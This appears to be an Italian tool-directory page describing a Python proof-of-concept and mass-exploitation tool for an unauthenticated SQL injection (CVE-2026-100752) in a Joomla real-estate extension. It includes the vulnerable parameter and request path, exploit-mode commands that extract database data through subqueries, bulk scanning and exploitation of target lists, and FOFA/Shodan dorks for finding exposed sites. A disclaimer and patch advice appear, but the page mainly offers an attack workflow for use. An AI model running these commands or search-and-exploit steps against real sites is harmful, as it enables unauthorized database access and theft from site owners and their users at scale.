Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/murrez/cve-2026-100752
RicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitScripting e AutomazioneSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmurrez/cve-2026-100752

CVE-2026-100752

PoC in Python 3 ed exploit di massa per CVE-2026-100752, un'iniezione SQL non autenticata in OrdaSoft Joomla Real Estate Manager <=6.7.8 tramite il parametro ORDER BY order_field.

Vedi Repository
4 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) SQL injection non autenticata

PoC in Python 3 per CVE-2026-100752 — estensione Joomla OrdaSoft Real Estate Manager (Free) ≤ 6.7.8. Corretta in 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Catalogohttps://pocbit.org/pocs/
Componentecom_realestatemanager
Filesite/realestatemanager.php
Parametroorder_field → ORDER BY (senza quoting, nessuna allow-list)
AuthNessuna (viste pubbliche di listing / ricerca / categoria)
CWECWE-89 SQL Injection
InoltreInjection POST legacy su order_direction (Metasploit / audit pre-6.7.9)

Output del PoC (screenshot)

Banner PoCbit colorato, seguito dall'output JSON di --mode exploit: exploited: true, vettore order_field_get, rotta showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Comando di esempio:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(Lo screenshot proviene da un ambiente di test autorizzato; l'URL di destinazione è a scopo di validazione del PoC.)


Riepilogo della vulnerabilità (Türkçe)

Real Estate Manager (Free) è un'estensione OrdaSoft per la gestione di annunci immobiliari su Joomla. Nelle versioni 6.7.8 e precedenti, il parametro di richiesta order_field viene inserito direttamente nella clausola ORDER BY all'interno di site/realestatemanager.php; non esiste allow-list dei nomi di colonna, escaping o cast. Senza autenticazione è possibile sfruttare le query di navigazione per categoria, risultati di ricerca e listing completo degli annunci.

In caso di SQLi riuscita, devono essere valutati i rischi di lettura dal database (versione, hash degli utenti, dati del sito), scrittura/cancellazione in base ai privilegi e RCE concatenata. Aggiornare alla versione 6.7.9 o superiore (OrdaSoft security release).


Meccanismo tecnico

Front controller Joomla:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field controlla la colonna/espressione della ORDER BY. Valori come subquery error-based possono essere iniettati perché il valore viene concatenato nell'SQL senza binding né validazione.

Contesti di query interessati (secondo il testo della CVE):

  1. Navigazione per categoria (showCategory e correlate)
  2. Risultati di ricerca
  3. Listing completo degli immobili

Questo PoC:

  • Fingerprint di com_realestatemanager (path + versione opzionale dal manifest)
  • Scraping di catid / Itemid dall'HTML del sito
  • Probe dei task: showCategory, showSearch, showSearchResult, showRent, showBuy
  • Primario: GET e POST error-based su order_field
  • Fallback: order_direction=asc,<injection> (vettore storico, ancora utile su alcune build)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (righe con leak SELECT riuscito)

Requisiti

cd CVE-2026-100752
pip install -r requirements.txt

Utilizzo

Target singolo — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive tenta SELECT VERSION() quando la prova boolean/error non è conclusiva.

Target singolo — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Mass bulk

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagRuolo
--mode exploitEstrazione dati error-based (mass supportato)
--subquerySQL interno per il payload double-query CONCAT(0x7e, …)
--vectorForza order_field_get, order_field_post o order_direction_post
-jTarget in parallelo
--no-colorTerminale semplice

Il JSONL include pocbit, pocbit_catalog, pocbit_page, cve, component.


Dork FOFA / asset discovery

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Stile Shodan (se supportato): http.html:com_realestatemanager

Esportare gli hostname in targets.txt (un URL per riga), poi check → hits → exploit solo su sistemi autorizzati.


Rilevamento versione

Manifest (quando esposto):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

Se versione ≤ 6.7.8 → likely_vulnerable_version. Se ≥ 6.7.9 → patched_version (l'exploit potrebbe comunque fallire).


CVE correlate (stesso ciclo di rilascio)

CVETipoCorretta
CVE-2026-100752SQLi non autenticata (order_field)6.7.9
CVE-2026-100753XSS riflesso (viste pubbliche immobili)6.7.9

Stesso batch del vendor (Set 2026): Vehicle Manager e altre estensioni OrdaSoft hanno ricevuto CVE separate — applicare le patch a tutti i componenti OrdaSoft in uso.


Riferimenti

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (Set 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (POST legacy order_direction)

Note legali

Solo per test di sicurezza autorizzati e validazione di patch. Non utilizzare contro sistemi senza autorizzazione.


Descrizione del repository GitHub

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Scarica lo strumento